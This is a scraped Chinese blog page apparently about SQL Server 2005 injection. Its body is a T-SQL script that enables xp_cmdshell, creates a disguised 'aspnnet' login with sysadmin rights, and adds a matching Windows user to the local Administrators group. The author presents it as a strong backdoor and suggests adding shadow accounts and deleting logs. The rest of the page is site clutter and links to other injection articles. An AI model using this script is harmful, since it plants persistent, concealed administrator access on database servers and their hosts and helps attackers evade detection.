SQL Server 2005 SQL 注入

最新推荐文章于 2017-05-07 12:27:18 发布
最新推荐文章于 2017-05-07 12:27:18 发布
阅读量364 收藏
点赞数
分类专栏: SQLServer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/r13929847477/article/details/52412675
版权

--攻与防,矛与盾

--sql server 2005上测试成功的。再加上影子账户及删除日志。那就是很强的后门了。

--enabble xp_cmdshell
EXEC sys.sp_configure N'show advanced options', N'1'  RECONFIGURE WITH OVERRIDE
go
EXEC sys.sp_configure N'xp_cmdshell', N'1'
go
RECONFIGURE WITH OVERRIDE
go
EXEC sys.sp_configure N'show advanced options', N'0'  RECONFIGURE WITH OVERRIDE
go

-- Unenable xp_cmdshell
EXEC sys.sp_configure N'show advanced options', N'1'  RECONFIGURE WITH OVERRIDE
go
EXEC sys.sp_configure N'xp_cmdshell', N'0'
go
RECONFIGURE WITH OVERRIDE
go
EXEC sys.sp_configure N'show advanced options', N'0'  RECONFIGURE WITH OVERRIDE
go


exec master.dbo.sp_addlogin aspnnet;--  
exec master.dbo.sp_password null,aspnnet,aspnnet;--  
exec master.dbo.sp_addsrvrolemember aspnnet,sysadmin;--  
exec master.dbo.xp_cmdshell 'net user aspnnet aspnnet /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--  
exec master.dbo.xp_cmdshell 'net localgroup administrators aspnnet /add';--  

老友记茶舍
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
 基于SQL Server2005库存管理系统的设计与实现
01-30
 为全面管理仓库中储存的商品和货物,缩短库存信息流转时间,使企业的...设计并实现了基于SQL Server2005的库存管理系统。应用结果表明该系统节约了成本,提高了企业的经营效率,并具有较强的实用性和可移植性。
 基于LabVIEW的随钻测量上位机系统设计方法
01-30
 为了缩短项目开发周期,提高随钻测量上位机系统开发效率,采用LabVIEW为...设计了基于SQL Server的数据存储查询系统,并可以根据用户需要将数据导出到EXCEL报表中。经过测试,该系统性能良好,达到了预期的效果。
sql server 2005注入技巧集
07-17 1493
 [sql server 2005,检测权限]and 1=(select IS_SRVROLEMEMBER(sysadmin))and 1=(select IS_SRVROLEMEMBER(serveradmin))and 1=(select IS_SRVROLEMEMBER(setupadmin))and 1=(select IS_SRVROLEMEMBER(securit
收藏:SQL Server 2005|2008 SQL 注入
congyaguan5319的博客
02-13 138
收藏:SQL Server 2005 SQL 注入http://msdn.microsoft.com/zh-cn/library/ms161953(SQL.90).aspxSQL Server 2008 SQL 注入http:/...
SQL 注入-SQL Server 2005 联机丛书(2008 年 11 月)
congyaguan5319的博客
03-11 72
在代码中检查 SQL 注入 应检查所有调用 EXECUTE、EXEC 或 sp_executesql 的代码。可以使用类似如下的查询来帮助您标识包含这些语句的过程。 SELECT object_Name(id) FRO...
桂林老兵的SQLSERVER高级注入技巧
12-13 1078
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友:前言:即是高级技巧,其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入,建议大家看看本站的SQL语法相关文章[获取全部数据库名]select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库[获得数据表名][将字段值
SQL server手工注入学习笔记
愚者
05-07 8538
MSSQL注入(SQL server) 由于这学期正在学数据库,所以理解SQL语句还是可疑的。看完视频后自己动手实践顺便整理了学习笔记,有些来自视频有些来自其他大佬的博客。 一:判断是否有注入 and 1=1 and 1=2 判断注入的方法是一样的 二:初步判断是否是MSSQL and user>0 三:判断数据库系统 and (select count(*) fro
 在线考试题库管理子系统的设计与实现
01-30
该子系统主要采用VB6.0和SQL Server2000进行开发编程,系统能够完成在线考系统出题组卷要求。实际应用表明,该子系统具有界面操作简便、题库结构和入题出题操作方式能满足普通在线考试需求,达到了设计要求。
 基于Socket网络编程的远程物流防伪系统的设计
01-30
该系统在Visual Studio结合SQL Server的开发平台下,采用Socket套接字以及GPRS无线通信的方式实现数据采集终端对远程服务器的查询功能。运行结果表明:该系统具有操作方便、使用成本低和安装容易等多项优点。在商品...
 基于B/S结构的移动电子政务系统的设计
01-30
针对当前无线通信和移动计算技术在政务工作中的应用模式的特点,本文采用Browser/Server三层结构设计模式,利用ASP技术和SQL Server作为后台数据库服务器设计了此移动电子政务系统,分析了政务办公的模块结构,讨论...
sqlserver2005+sa密码反复被修改
Berlin House
10-13 8286
一来到公司同事说系统登录提示‘sa’登录密码错误,郁闷!这么重要的密码谁会去随便改动它?于是把sa密码先改回来,测试程序一切正常。 可是不到5分钟后又被告知‘sa’登录密码错误! 反复反复修改了几次sa密码,都是被修改,并且修改时间越来越快 先了解一下情况,原来服务器开
MySQL 手工注入语句总结
senlin1202的博客
03-04 7103
sunzn:存查备用! 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=
SQLSERVER问题
怀着坚定的梦就能走向远方
03-18 836
1.新增加用户无法登录的问题 装上SQLSERVER 2005已经很久了,以前登录直接选择'Windows身份验证',并没有什么问题出现!可前段时间采用'SQLSERVER身份验证'去登录,随之的问题就来了.无论用什么方法就是一个结果出错! 出错的原因是:'用户 'sa' 登录失败。该用户与可信 SQL Server 连接无关联'.今天上网上查了半天还是搞不定,最后经过网上和书上的汇总,终于搞定
秃鹰算法BES优化Transformer-LSTM负荷数据回归预测【含Matlab源码 6405期】.zip
08-01
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化Transformer-LSTM预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化Transformer-LSTM预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化Transformer-LSTM预测 4.4.3 灰狼算法GWO/狼群算法WPA优化Transformer-LSTM预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化Transformer-LSTM预测 4.4.5 萤火虫算法FA/差分算法DE优化Transformer-LSTM预测 4.4.6 其他优化算法优化Transformer-LSTM预测
EtherCAT协议(中文版)完整1-6册
08-01
ETG1000_1_CHN_Overview_V1i0i2_C01 ETG1000_2_CHN_EcatPhysicalLayer_V1i0i2_C01 ETG1000_3_CHN_EcatDLLServices_V1i0i2_C01 ETG1000_4_CHN_EcatDLLServices_V1i0i2_C01 ETG1000_5_CHN_EcatALServices_V1i0i2_C01 ETG1000_6_CHN_EcatALProtocols_V1i0i2_C01 ETG1000_6_V1i0i3_S_R_EcatALProtocols
大数据中心建设方案.pptx
最新发布
08-01
大数据中心建设方案.pptx
PHP开发神器:探索流行的PHP代码编辑器和IDE
08-01
PHP(Hypertext Preprocessor)是一种广泛使用的开源脚本语言,主要用于Web开发,将服务器端的脚本与HTML页面相结合,创建动态交互式Web页面。PHP的名字是一个递归缩写,表示"PHP: Hypertext Preprocessor"。 ## PHP的主要特点: 1. **服务器端脚本**:PHP代码在服务器上执行,生成HTML内容,然后发送给客户端浏览器显示。 2. **嵌入HTML**:PHP代码可以直接嵌入到HTML代码中,或者通过PHP标签包含在单独的文件中。 3. **强大的功能**:PHP提供了丰富的内置函数和库,支持多种数据库连接(如MySQL、PostgreSQL等),可以处理表单、文件上传、发送邮件等。 4. **跨平台**:PHP可以在多种操作系统上运行,包括Linux、Windows、macOS等。 5. **面向对象**:PHP支持面向对象编程(OOP),允许开发者创建类和对象。 6. **可扩展性**:PHP可以通过PECL扩展库来扩展其功能。 7. **社区支持**:PHP有一个庞大的开发者社区,提供大量的框架、工具和资源。 #
[毕业设计]JAVA实现SNMP协议对网络设备MIB库的访问与数据解析(源代码+论文).zip
08-01
[毕业设计]JAVA实现SNMP协议对网络设备MIB库的访问与数据解析(源代码+论文)
sql nbsp;&nbsp的意义
05-23
SQL 中,`nbsp;` 的意义与 HTML 中相同,它可以用来在数据中添加空格,但不会被解释为 SQL 语句的分隔符或者其他特殊字符。一般情况下,`nbsp;` 不太常用,因为在 SQL 中可以直接使用空格来分隔关键字、列名和值...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值